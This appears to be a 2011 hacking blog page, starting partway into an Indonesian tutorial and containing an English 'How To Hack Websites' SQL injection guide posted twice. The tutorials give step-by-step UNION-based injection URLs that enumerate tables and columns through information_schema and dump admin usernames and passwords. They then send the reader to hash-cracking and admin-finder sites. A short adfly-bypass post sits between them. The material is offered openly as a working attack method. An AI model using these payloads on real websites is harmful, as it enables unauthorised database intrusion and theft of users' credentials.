contoh: [site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal: [site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
[+]step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek
versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
[+]step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

seumpama table yang muncul adalah "admin"


===========
[+]step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--


=============
[+] step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

www.ascii-convert.co.cc

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--


============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--


contoh kata yang keluar adalah id,username,password

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

Nah, nanti akan ada beberapa password yang sudah di encrypt. jadi butuh decrtypt dulu ini membuka encrypt password nya

Decrypt password Disini : http://www.hashchecker.de/

==============
[+] step Delapan:=
==============

tahap terakhir mencari halam admin atau login

Link : http://th3-0utl4ws.com/tools/admin-finder/index.php
(Continue)..

(Continue)..

Juli 25, 2011

Link decoder



Masukkan link Shortener apapun,misal :

http://bit.ly/h68Pbw
http://tiny.cc/srkjj
http://alturl.com/jg2xh

klick
"Get the original links !"
You could enter multiple links, splitted by "Enter" character


link :
http://cyberflux.info/shortlink.php
 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Tahap kedua untuk link adfly

1.  Instal oadons-mozilla GREASEMONKEY
https://addons.mozilla.org/pt-BR/firefox/addon/748.
2.  Bukak
http://userscripts.org/scripts/show/56530 
    untuk mengiinstal Scriptnya (instal -pojok -atas- kanan)
3. Tunggu selesai instal
4. Masukkan link adfly di adres bar..
5. Waiting 5 Secend ... ada  popup warna biru.. selesai tinggal download... (Continue)..

(Continue)..

Juli 22, 2011

How To Hack Websites (SQL Injection Tutorial) Part 1



SQL Injection in MySQL Databases

SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.

Step 1:

When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1
or
www.site.com/id=5
Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:
www.site.com/page=1'

If the database is vulnerable, the page will spit out a MySQL error such as;

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.


Step 2


Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:

www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--  
If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.

Step 3


We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,

for example:
www.site.com/page=1 union all select 1,2,3,4--
This is what we would enter if we have 4 columns. If you have 7 columns you would put,  
union all select 1,2,3,4,5,6,7-- .
If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.

Step 4


We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:

user()
database()
version()
or if these dont work try...
@@user
@@version
@@database

For example the url would look like:

www.site.com/page=1 union all select 1,user(),version(),4--

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.

IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5


In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.

UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6


In this Step we want to list all the column names in the database, to do this we use the following command:

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--

This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.


Step 7


Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,

union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website.

A very Nice
Tutorial Written by Xinapse from Firewire-Security.com

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Nyuri dari kang hackguide4
                                                                ~**~
(Continue)..

(Continue)..

Learn How Hackers Hack Websites MYSQL Injection Tutorial (Part 2)


Learn How To Hack Websites , Mysql Injection Tutorial
SQL Injection in MySQL Databases
SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.


Step 1:
When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1
or
www.site.com/id=5

Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:

www.site.com/page=1'

If the database is vulnerable, the page will spit out a MySQL error such as;

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.

Step 2

Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:

www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--

If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.

Step 3

We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--

This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.

Step 4

We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or if these dont work try...
@@user
@@version
@@database

For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5

In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6
In this Step we want to list all the column names in the database, to do this we use the following command:

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.

Step 7

Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website
.........................................................................
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Nyuri dari kang Hackguid4
                                                         ~**~
(Continue)..

(Continue)..